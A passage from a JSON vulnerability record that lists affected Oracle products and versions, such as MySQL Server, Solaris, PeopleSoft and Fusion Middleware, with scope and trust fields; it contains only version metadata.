"trust": 0.3,
"vendor": "oracle",
"version": "1.2"
},
{
"model": "sun data center infiniband switch",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "362.2.2"
},
{
"model": "sun blade ethernet switched nem 24p 10ge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "60001.2"
},
{
"model": "sparc enterprise m9000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m9000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m8000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m8000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m5000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m5000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m4000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m4000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m3000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m3000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "solaris cluster",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3"
},
{
"model": "solaris cluster",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.3"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.3"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10"
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.2.2"
},
{
"model": "siebel applications ip2016",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "siebel applications ip2015",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "siebel applications ip2014",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5"
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1.1"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.2"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.71"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.63"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.2"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.1"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.4"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.3"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.1"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.2"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.1"
},
{
"model": "primavera contract management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.2"
},
{
"model": "portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.16.0"
},
{
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.6"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.5"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.4"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.3"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.2"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.1"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.6"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.5"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.4"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.3"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.2"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.55"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.54"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.53"
},
{
"model": "peoplesoft enterprise fscm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.2"
},
{
"model": "peoplesoft enterprise fscm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.1"
},
{
"model": "outside in technology",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.2"
},
{
"model": "outside in technology",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1"
},
{
"model": "outside in technology",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.0"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.7"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.29"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.28"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.27"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.26"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.23"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.22"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.21"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.48"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.47"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.46"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.45"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.42"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.41"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.40"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.25"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.24"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.20"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.16"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.15"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.44"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.43"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.36"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.35"
},
{
"model": "mysql",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.7.12"
},
{
"model": "mysql",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.30"
},
{
"model": "mysql",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.49"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.8.1"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.8"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.7"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.6"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.5"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "jrockit r28.3.10",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.30"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.24.0"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0.0"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"model": "jd edwards enterpriseone tools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.2.0.5"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.7.1"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.6.1"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.2"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.0"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.2"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.7.1"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.6.1"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.2"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.0"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.2"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "insurance calculation engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.7.1"
},
{
"model": "insurance calculation engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.2"
},
{
"model": "insurance calculation engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.2"
},
{
"model": "in-memory policy analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.1"
},
{
"model": "hyperion financial reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.2.4"
},
{
"model": "http server 12c",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"model": "http server 11g",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.0.1"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.0"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0.12"
},
{
"model": "healthcare analytics data integration",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.0.0.0"
},
{
"model": "health sciences information manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.1.0"
},
{
"model": "health sciences information manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0.2.3"
},
{
"model": "health sciences information manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.2.8.3"
},
{
"model": "health sciences clinical development center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.2.0"
},
{
"model": "health sciences clinical development center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.1.0"
},
{
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.2"
},
{
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.1"
},
{
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.1.1"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.23.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.22.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.18.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.10"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.9"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.8"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.7"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.6"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.5"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.4"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.3"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.2"
},
{
"model": "fujitsu m10-4s server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2290"
},
{
"model": "fujitsu m10-4s server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2271"
},
{
"model": "fujitsu m10-4s server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2230"
},
{
"model": "fujitsu m10-4 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2290"
},
{
"model": "fujitsu m10-4 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2271"
},
{
"model": "fujitsu m10-4 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2230"
},
{
"model": "fujitsu m10-1 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2290"
},
{
"model": "fujitsu m10-1 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2271"
},
{
"model": "fujitsu m10-1 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2230"
},
{
"model": "flexcube direct banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.1"
},
{
"model": "flexcube direct banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.3"
},
{
"model": "flexcube direct banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.2"
},
{
"model": "financial services lending and leasing",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.2"
},
{
"model": "financial services lending and leasing",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "exalogic infrastructure",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"model": "exalogic infrastructure",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.0"
},
{
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.3.2"
},
{
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.2"
},
{
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.4"
},
{
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9"
},
{
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1.0.0"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.0.5"
},
{
"model": "enterprise communications broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"model": "engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.1.3.0"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.3"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.2"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.5"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.4"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3"
},
{
"model": "documaker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"model": "demand planning",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2"
},
{
"model": "demand planning",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1"
},
{
"model": "database 12c release",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "112.12"
},
{
"model": "database 12c release",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "112.11"
},
{
"model": "database 11g release",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "211.2.0.4"
},
{
"model": "communications unified session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3.5"
},
{
"model": "communications unified session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2.5"
},
{
"model": "communications session border controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3.0"
},
{
"model": "communications session border controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2.0"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.9"
},
{
"model": "communications operations monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.2.0.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.1.0.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.0.2.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.0.1.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.4.1.5.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.530.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.529.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.5.33.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.5"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3"
},
{
"model": "communications eagle application processor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.0"
},
{
"model": "communications core session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3.5"
},
{
"model": "communications core session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2.5"
},
{
"model": "communications asap",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3"
},
{
"model": "communications asap",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2"
},
{
"model": "communications asap",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "business intelligence enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.2.1.0.0"
},
{
"model": "business intelligence enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"model": "business intelligence enterprise edition",
